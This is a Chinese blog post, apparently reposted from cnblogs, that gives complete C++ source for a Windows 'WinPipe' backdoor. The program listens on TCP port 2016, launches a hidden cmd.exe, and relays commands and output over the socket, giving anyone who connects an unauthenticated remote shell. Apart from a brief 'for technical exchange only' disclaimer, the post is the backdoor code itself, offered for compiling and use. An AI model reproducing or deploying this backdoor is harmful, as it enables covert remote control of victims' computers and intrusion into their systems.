• WinPipe后门程序代码示例(仅限技术交流)


    具体怎么编译、生成可执行程序,不懂的请先学习C++程序代码编译和集成开发环境。

    多的不说了,只有两个代码文件,一个头文件,一个源文件。不多说了,直接上干货。

    (恶意使用,或者商用,后果自负,与本人无关。)

    head.h

    #pragma once
    
    #ifndef WINVER                          // Specifies that the minimum required platform is Windows Vista.
    #define WINVER 0x0600           // Change this to the appropriate value to target other versions of Windows.
    #endif
    
    #ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.
    #define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.
    #endif
    
    #ifndef _WIN32_WINDOWS          // Specifies that the minimum required platform is Windows 98.
    #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.
    #endif
    
    #ifndef _WIN32_IE                       // Specifies that the minimum required platform is Internet Explorer 7.0.
    #define _WIN32_IE 0x0700        // Change this to the appropriate value to target other versions of IE.
    #endif
    
    #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
    // Windows Header Files:
    #include <windows.h>
    
    // Windows Socket Files:
    #include <winsock2.h>
    #pragma comment(lib, "ws2_32.lib")
    
    // C RunTime Header Files
    #include <stdlib.h>
    #include <malloc.h>
    #include <memory.h>
    #include <tchar.h>
    
    class CThreadNode 
    {
    public:
    
    	SOCKET m_Sock;
    	HANDLE hPipe;
    	CThreadNode() 
    	{
    		m_Sock = INVALID_SOCKET;
    		hPipe = NULL;
    	}
    };
    

     main.cpp

    #include "Head.h"
    
    
    bool SocketInit()
    {
    	WSADATA wsaData={0};
    	if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR )
    	{
    		return TRUE;
    	}
    	else
    	{
    		return FALSE;
    	}
    }
    
    int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen)
    {
    	if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 ) 
    	{
    		return -1;
    	}
    	int iCurrSend = 0, offset = 0;
    	do {
    		iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);
    		if ( iCurrSend <= 0 ) 
    		{
    			break;
    		}
    		dwBufLen -= iCurrSend;
    		offset += iCurrSend;
    	} 
    	while ( dwBufLen > 0 );
    	return offset;
    }
    
    BOOL bExit = FALSE;
    #define RECV_BUF_LEN 1024*10
    char szCmdBuf[MAX_PATH] = {0};
    
    DWORD WINAPI ThreadInputProcess(LPVOID lpParam)
    {
    	CThreadNode tNode = *(CThreadNode *)lpParam;
    	DWORD dwWrited = 0, dwRecvd = 0;
    	char szBuf[MAX_PATH] = {0};
    	BOOL bRet = FALSE;
    	while ( TRUE ) 
    	{
    		dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);
    		if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR ) 
    		{
    			WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL);
    		}
    		else{
    			closesocket(tNode.m_Sock);
    			WriteFile(tNode.hPipe, "exit
    ", sizeof("exit
    "), &dwWrited, NULL);
    			CloseHandle(tNode.hPipe);
    			bExit = TRUE;
    			break;
    		}
    		Sleep(50);
    	}
    	return TRUE;
    }
    
    DWORD WINAPI ThreadOutputProcess(LPVOID lpParam)
    {
    	CThreadNode tNode = *(CThreadNode *)lpParam;
    	char szBuf[RECV_BUF_LEN] = {0};
    	DWORD dwReadLen = 0, dwTotalAvail = 0;
    	BOOL bRet = FALSE;
    	while ( !bExit ) {
    		dwTotalAvail = 0;
    		bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
    		if ( bRet && dwTotalAvail > 0 ) {
    			bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);
    			if ( bRet && dwReadLen > 0 ) {
    				SendData(tNode.m_Sock, szBuf, dwReadLen);
    			}
    			Sleep(50);
    		}
    	}
    	CloseHandle(tNode.hPipe);
    	return TRUE;
    }
    
    BOOL StartBackdoorShell(UINT uPort)
    {
    	if ( !SocketInit() ) {
    		return FALSE;
    	}
    	SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    	if ( m_ListenSock == INVALID_SOCKET ) {
    		return FALSE;
    	}
    	sockaddr_in sServer = {0};
    	sServer.sin_family = AF_INET;
    	sServer.sin_addr.s_addr = htonl(INADDR_ANY);
    	sServer.sin_port = htons(uPort);
    	if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) {
    		return FALSE;
    	}
    	if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) {
    		return FALSE;
    	}
    	SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL);
    	// Create Pipe;
    	CThreadNode m_ReadNode, m_WriteNode;
    	STARTUPINFO si = {0};
    	si.cb = sizeof(STARTUPINFO);
    	PROCESS_INFORMATION pi = {0};
    	DWORD dwThreadRead = 0, dwThreadWrite = 0;
    	HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;
    	HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;
    	HANDLE hThreadOutput = NULL, hThreadInput = NULL;
    	SECURITY_ATTRIBUTES sa = {0};
    	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    	sa.lpSecurityDescriptor = NULL;
    	sa.bInheritHandle = TRUE;
    
    	if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {
    		return FALSE;
    	}
    	m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock;
    
    	GetStartupInfo(&si);
    	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    	si.hStdInput = hReadPipe1;
    	si.hStdOutput = si.hStdError = hWritePipe2;
    	si.wShowWindow = SW_HIDE;
    	TCHAR szCmdLine[MAX_PATH] = {0};
    	GetSystemDirectory(szCmdLine, MAX_PATH);
    	_tcscat_s(szCmdLine, MAX_PATH, _T("\cmd.exe"));
    	if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) )
    	{
    		return FALSE;
    	}
    	m_ReadNode.hPipe = hReadPipe2;
    	hThreadOutput = CreateThread(NULL, 0, ThreadOutputProcess, &m_ReadNode, 0, &dwThreadWrite);
    	m_WriteNode.hPipe = hWritePipe1;
    	hThreadInput = CreateThread(NULL, 0, ThreadInputProcess, &m_WriteNode, 0, &dwThreadRead);
    
    	HANDLE szHandles[] = { hThreadOutput, hThreadInput };
    	WaitForMultipleObjects(2, szHandles, TRUE, INFINITE);
    	return TRUE;
    }
    int APIENTRY _tWinMain(HINSTANCE hInstance,
    	HINSTANCE hPrevInstance,
    	LPTSTR    lpCmdLine,
    	int       nCmdShow)
    {
    	StartBackdoorShell(2016);
    	ExitProcess(0);
    	return 0;
    }
    

     

  • 原文地址:https://www.cnblogs.com/microzone/p/5445459.html